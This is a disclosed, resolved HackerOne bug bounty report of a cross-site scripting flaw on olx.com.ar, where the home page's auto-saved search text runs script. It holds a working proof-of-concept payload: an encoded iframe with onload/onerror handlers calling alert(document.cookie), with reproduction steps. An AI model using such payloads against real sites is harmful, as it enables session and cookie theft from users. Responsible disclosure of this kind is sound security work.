XSS on Home page olx.com.ar via auto save search text

Disclosed: 2016-10-15 06:37:23 By c37hun To olx

Unknown

Vulnerability Details

Hi guys, I found XSS vulnerability on Home page olx.com.ar via auto save search text 1. Copy full link and go to the URL in browser: >https://www.olx.com.ar/nf/search/xss%22-'%20%22%3E%3Ciframe/src%20////onload%20=%20alert(document.cookie)%20onerror=alert(document.cookie) 2. Click logo button go back to home page look play load xss Sincerely, Jeyhun Jafarov (c37hun) Cybersecurity Specialist [email protected]

Actions

View on HackerOne

Report Stats

Report ID: 151691
State: Closed
Substate: resolved
Upvotes: 6

XSS on Home page olx.com.ar via auto save search text

Vulnerability Details

Actions

Report Stats

Share this report